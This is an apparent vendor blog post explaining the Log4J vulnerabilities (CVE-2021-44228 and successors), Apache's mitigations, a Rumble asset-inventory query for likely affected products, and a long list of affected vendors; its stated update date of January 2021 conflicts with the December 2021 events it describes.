Finding applications that use Log4J

, by Pearce Barry
HD Moore

Last updated on January 17, 2021 at 16:00 CST (-0600)

Rumble can help you build an up-to-date asset inventory and search for assets that may be affected by the recent spate of Log4J vulnerabilities (e.g. Log4shell, etc.). You can then share the results with your security team for investigation and mitigation.

Rumble is not a vulnerability scanner. At this stage, vulnerability scanners have limited coverage, and are unable to detect all variants with a normal scan. Updates will eventually be available, but until then, Rumble’s asset inventory can help you get ahead of the issue.

Log4j vulnerabilities

Internet discussion was abuzz on December 9th about an 0-day vulnerability that can yield remote code execution (RCE) in Apache’s popular Log4J logging library for Java. This particular vulnerability — tracked as CVE-2021-44228 with the maximum “critical” CVSS score of 10 — resides in Log4J’s lookup capability, combined with JNDI (Java Naming and Directory Interface). This issue is widespread because many developers were unaware that Log4J was dangerous to use with unfiltered input.

The most significant impact is that an attacker can cause a string to reach the logger, that when processed by Log4J, executes arbitrary code. The first examples of this used the ${jndi:ldap} path, which could lead to arbitrary code being loaded from a remote URL. This path is partially mitigated by the use of newer Java runtimes that block the URL-based class loader by default. Unfortunately, a modern version of Java may not be enough to prevent exploitation, as the application itself may expose classes that can be used to run arbitrary code.

While Apache released fixes to CVE-2021-44228 in Log4J version 2.15.0, it was discovered these fixes were “incomplete in certain non-default configurations”, allowing for exploitation in certain circumstances (tracked as CVE-2021-45046 (with a “critical” CVSS core of 9.0), leading to a Log4J 2.16.0 release to address CVE-2021-45046.

Following that release, a new vulnerability was raised which can yield a denial-of-service attack via infinite recursion. Tracked as CVE-2021-45105 (and with a “high” CVSS score of 7.5), this vulnerability appeared to affect Log4J versions 2.8 through the most recent 2.16.0 release, and was fixed in versions 2.17.0 (for Java 8) and 2.12.3 (for Java 7).

Then on December 28th, security researchers at Checkmarx published findings of another RCE present in Log4J 2.17.0, one which requires the attacker have permissions to update the logging configuration and, when successful, can yield RCE. Tracked as CVE-2021-44832 (and with a “medium” CVSS score of 6.6), Apache released a fix for this latest vulnerability in Log4J versions 2.17.1 (for Java 8 and later), 2.12.4 (for Java 7), and 2.3.2 (for Java 6).

The broad popularity of Log4J—coupled with the relative ease of exploiting this vulnerability—creates potential conditions for far-reaching exploitation (similar to Shellshock).

Google’s security team have scanned the contents of Maven Central and found over 35,000 affected packages, amounting to over 8% of those in the repository. Any application making use of the affected packages as dependencies may be vulnerable.

Affected applications include Elastic Search, Elastic LogStash, GrayLog2, Minecraft (client and server), Neo4J, many Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket), many VMware products (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu), Grails, and dozens if not hundreds of others. Log4J versions since 2.0 are reported to contain this vulnerability, which was originally disclosed to Apache several weeks ago by the security team at Alibaba Cloud.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently created a repo for tracking products/applications affected by Log4Shell, which will likely become the most reliable, long-term source-of-truth. We will continue to update this blog post while CISA builds out their list.

Note: Rumble components–cloud platform, self-hosted, explorer, and CLI scanner–are not affected by this issue.

Mitigations

Patches were made available to prevent code execution Log4J version 2.15.0, but these patches did not disable inline message lookup, which can expose things like environment variables and system configuration settings to an attacker that can observe the generated logs. Additional patches were made available in Log4J version 2.16.0 to make JNDI lookups disabled by default, limited to certain protocols, and only localhost allowed by default. Further patches have been made in Log4J version 2.17.0 to protect from uncontrolled recursion via self-referential lookups, along with additional patches in Log4J version 2.17.1 for limiting JNDI data source names to the java protocol.

For mitigations that folks can take immediately, Apache has offered some guidance.

Note: Initially it was thought that the problem could be mitigated by setting log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS. Apache have now clarified that those mitigation strategies are insufficient.

Mitigating these issues requires one of the following actions:

$ zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
  • Overriding the org.apache.logging.log4j.core.lookup.JndiLookup class by making appropriate changes to your classloader configuration:

It is worth noting that an updated version of the Java runtime is not a sufficient mitigation. Newer versions of Java block the URL class loader by default, but can still be abused to leak secrets from the environment, and deserialization attacks may still succeed using classes already loaded by the process.

How to find applications that use Log4J with Rumble

Identifying every application, device, and service using the Log4J library is going to be an ongoing effort for security professionals. We will continue updating this post and our pre-built queries as more information becomes available.

The following query can be used to identify applications that are likely to be affected by this issue:

product:atlassian or product:avaya or product:coldfusion or product:coyote or product:cpanel or product:druid or product:"elastic search" or product:"epolicy orchestrator" or product:flink or product:graylog or product:hadoop or product:horizon or product:imc or product:jamf or product:jboss or product:jetty or (product:"kerio connect" and protocol:http) or product:logstash or product:metabase or product:minecraft or product:mongodb or product:neo4j or product:openfire or product:pega or product:recoverpoint or product:resin or product:rundeck or product:symantec or product:sonicwall or product:solarwinds or product:sophos or product:splunk or product:tableau or product:tomcat or product:="ubiquiti unifi" or product:"vmware horizon" or product:"vmware vcenter" or product:"vmware vrealize" or product:"vmware site recovery" or product:vmanage or product:wowza or hw:netapp or hw:imc or hw:"ucs manager" or hw:"crosswork son appliance" or hw:"site recovery manager" or hw:sonicwall or tcp_port:8983 or tcp_port:9092 or tcp_port:7077 or tcp_port:5347 or protocol:cassandra or protocol:elasticsearch
Finding Log4J applications with Rumble

As always, any prebuilt queries we create are available from our Queries Library. Check out the library for other useful inventory queries. Self-hosted customers may copy the query above, or use the Export System Queries option to download an importable query set from the cloud console.

Acknowledgements

Affected products and services

ABB

Adobe

Akamai

Amazon

Apache

APC

Apereo

  • CAS — Versions affected: 6.3.X & 6.4.X
  • Opencast — Versions affected: < 9.10, < 10.6

Appeon

  • PowerBuilder — Versions affected: Appeon PowerBuilder 2017-2021 regardless of product edition

Aptible

  • Aptible — Versions affected: ElasticSearch 5.X

Arista

CloudVision

Cognitive Wi-Fi

DANZ Monitoring Fabric

Ascertia

Atlassian

  • Atlassian Products — Self-hosted if configured with log4j.
  • Bamboo — Self-hosted if configured with log4j.
  • Confluence — Self-hosted if configured with log4j.
  • Crowd — Self-hosted if configured with log4j.
  • Cruicible — Self-hosted if configured with log4j.
  • Fisheye — Self-hosted if configured with log4j.
  • Jira — Self-hosted if configured with log4j.

Avaya

The current list can be found in the advisory. Some products are still under investigation.

BeyondTrust

BMC Software

The current list can be found in the advisory.

  • Bladelogic Database Automation
  • BMC AMI Ops Common Rest API (CRA)
  • BMC AMI Ops Infrastructure (MVI)
  • BMC AMI Ops Insight
  • BMC AMI Ops UI
  • BMC Client Management
  • BMC Discovery
  • BMC Helix Continuous Optimization
  • BMC License Usage Collection Utility
  • CMDB
  • Control-M
  • Helix Data Manager
  • MainView Middleware Monitor
  • Remedy Smart Reporting
  • Sentry Storage All-in-One ETL
  • Sentry Storage Analyzer KM
  • Sybase KM
  • TrueSight App Visibility Manager
  • TrueSight Automation Console
  • TrueSight Automation for Networks
  • TrueSight Automation for Servers
  • TrueSight Infrastructure Management
  • TrueSight IT Data Analytics
  • TrueSight Operations Management
  • TrueSight Smart Reporting
  • TSOM Smart Reporting

Brainworks

  • Kerio Connect — version <9.4 is affected by the vulnerability CVE-2021-44228.

Broadcom (CA, Symantec)

The current list can be found in the advisory.

CaseWare

  • Cloud — Versions affected: unknown

CIS-CAT

CIS-CAT

Cisco

The current list can be found in the advisory. Many other products are still under investigation.

Cisco Cloud Hosted Services

Collaboration and Social Media

Network and Content Security Devices

Network Management and Provisioning

Routing and Switching - Enterprise and Service Provider

Unified Computing

Video, Streaming, TelePresence, and Transcoding Devices

Voice and Unified Communications Devices

Other

Cloudera

Cloudogu

Commvault

Confluent

Decos

Dell

EMC

Other

Dell

Other

Eaton

Elastic

Elastic has confirmed the vulnerability, but believes their mitigations make it difficult to exploit.

EVL Labs

  • JGAAP — Versions affected: < 8.0.2

Ewon

  • eCatcher — Versions affected: < 6.7.8

ExtraHop

  • Reveal(x) — Versions affected: <=8.4.6, <=8.5.3, <=8.6.4

F-Secure

F5

  • Traffix SDC — Versions 5.2.0 CF1 and 5.1.0 CF-30 - 5.1.0 CF-33 affected, other F5 products themselves are not vulnerable. F5 published guidance on mitigating through BIG-IP ASM/Advanced WAF and NGINX App Protect

Filecloud

  • Filecloud — FileCloud uses Apache Solr which in turn uses the log4j library.

ForgeRock

Fortinet

Github

Google Cloud

See Google Cloud Log4j security advisory.

Gradle

GuardedBox

HCL

See the KB entries matching CVE-2021-44228 for additional details.

HPE

HPE

Huawei

IBM

Analytics

Data Management

Spectrum

Sterling

WebSphere

Other

Informatica

Informatica state that their cloud remediation is complete, and have an advisory listing vulnerable on-premises products.

Intel

Intland

  • codebeamer — Versions affected: <= 20.11-SP11, <= 21.09-SP3

Ivanti

  • Avalache — Versions affected: 6.3.0, 6.3.1, 6.3.2, 6.3.3

Juniper

Cloud Services

Paragon Automation

Security

Other

Kronos

Lenovo

Networking Switches

Software

Software

Storage

ThinkAgile

ThinkStation

ThinkSystem

Lightbend

LOGalyze

McAfee

Microfocus

CyberRes

Microsoft

Mimecast

  • Mimecast — Affected services have been patched.

MobileIron

Mulesoft

NetApp

New Relic

Nutanix

  • AOS STS — Affected, patched in v6.0.2.4
  • File Analytics — Affected versions: 2.1.x, 2.2.x, 3.0+. Mitigation steps available for 2.1.x, 2.2.x, download available in 3.0.1.
  • Karbon — All versions affected, mitigation steps available.
  • Mine — All versions affected, mitigation steps available.
  • Objects — All versions affected, mitigation steps available.
  • SaaS-based Products — Most affected products have been patched, WAF mitigations in place.
  • Witness VM — All versions affected, mitigation steps available.

Okta

OneSpan

Digipass authentication products

On-premises server products

Oracle

  • Enterprise Manager — Affected versions: 13.3.2, 13.4, & 13.5. Note that Oracle has currently restricted access to vulnerable product info, this info is from the CISA.
  • Exadata — Affected versions: < 21.3.4. Note that Oracle has currently restricted access to vulnerable product info, this info is from the CISA.

OVHcloud

OxygenXML

Palo-Alto Networks

Ping Identity

Polycom

PortEx

  • Portex — Versions affected: <3.0.2

Positive Technologies

Progress

PTV Group

Software Solutions for Traffic & Mobility

PureStorage

  • FlashArray — Affected versions: Purity//FA 5.3.x, Purity//FA 6.0.x, Purity//FA 6.1.x, Purity//FA 6.2.x
  • FlashBlade — Affected versions: Purity//FB 3.0.x, Purity//FB 3.1.x, Purity//FB 3.2.x, Purity//FB 3.3.x
  • Portworx — Affected versions: 2.8.0+ with telemetry enabled
  • Pure Cloud Block Store — Affected versions: 6.1.xPAZ, 6.1.xPAWS, 6.2.xPAZ, 6.2.xPAWS
  • Pure VMA Collector — Affected versions: v3.x

Qlik

QMATIC

Rapid7

Real-Time Innovations (RTI)

Redhat

Cloud Computing

  • OpenShift 3.11 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenShift 4 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenShift Logging — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.
  • OpenStack Platform 13 — This issue has been assigned CVE-2021-44228 and rated with a severity impact of Critical.

Cloud Computing/Runtimes

Integration & Automation

Runtimes

Other

Redis

  • Jedis — Versions affected: 3.7.1, 4.0.0-rc2

Revenera

Rockwell Automation

Ruckus

SBT

  • SBT — Versions affected: < 1.5.6

Schneider Electric

  • EASYFIT — Versions affected: Current software and earlier
  • Ecoreal XL — Versions affected: Current software and earlier
  • Eurotherm Data Reviewer — Versions affected: V3.0.2 and prior
  • MSE — Versions affected: Current software and earlier
  • NetBotz750/755 — Versions affected: Software versions 5.0 through 5.3.0
  • NEW630 — Versions affected: Current software and earlier
  • SDK BOM — Versions affected: Current software and earlier
  • SDK-Docgen — Versions affected: Current software and earlier
  • SDK-TNC — Versions affected: Current software and earlier
  • SDK-UMS — Versions affected: Current software and earlier
  • SDK3D2DRenderer — Versions affected: Current software and earlier
  • SDK3D360Widget — Versions affected: Current software and earlier
  • Select and Config DATA — Versions affected: Current software and earlier
  • SNC-API — Versions affected: Current software and earlier
  • SNC-CMM — Versions affected: Current software and earlier
  • SNCSEMTECH — Versions affected: Current software and earlier
  • SPIMV3 — Versions affected: Current software and earlier
  • SWBEditor — Versions affected: Current software and earlier
  • SWBEngine — Versions affected: Current software and earlier

Siemens

SolarWinds

Soliton Systems

SonicWall

  • Email Security — ES 10.0.11 and earlier versions are affected.
  • NSM — Affected.
  • WAF — Version 3.x with Cloud Management enabled is affected.

Splunk

Stardog

  • Stardog — Versions affected: <7.8.1

Stratodesk

  • NoTouch — Versions affected: 4.5.231

SwingSet

  • SwingSet — Versions affected: < 4.0.6

TeamViewer

Tesorion

Tibco

Controllers

Hardware Controllers

Hardware Controllers

TrendMicro

Ubiquiti

USoft

  • USoft — Versions affected: 9.1 (unverified)

VMware

The current list can be found in the advisory.

WatchGuard

Wibu Systems

WitFoo

Zeiss

Zendesk

Other

Potentially affected products

  • Blackberry may be affected.
  • Citrix is still investigating many products.
  • Dell is still investigating.
  • Huawei is still investigating.
  • Kaseya is still investigating.
  • Oracle currently requires a support account to see affected products.
  • TrendMicro is still investigating.

Free Rumble trial

Don’t have Rumble and need help finding potentially vulnerable applications using Log4J?

Start your free trial
Rumble Screenshot

Similar Content

January 14, 2022

Ringing in 2022 with vulns, more vulns, and CISA guidance

Wrapping up 2021 and kicking off 2022, there were no shortages of vulnerabilities, vendor security advisories, patches, and active exploitations. Oh, did we mention, even more vulnerabilities and more patches? To ring in 2022 accordingly, let’s discuss some recent …

Read More

December 8, 2021

Finding Grafana instances

A zero-day vulnerability for Grafana, a popular analytics and visualization software, was leaked this week. This vulnerability provides attackers a path traversal attack vector that can result in data disclosure, resulting in access to files containing confidential …

Read More

December 3, 2021

Finding HP printers and MFPs vulnerable to Printing Shellz

Do you have HP printers and multi-function printers (MFPs)? You might want to look at the two recently published vulnerabilities that affect 150+ models. Named “Printing Shellz” by the F-Secure security researchers who reported them, these vulns have been around for ~8 …

Read More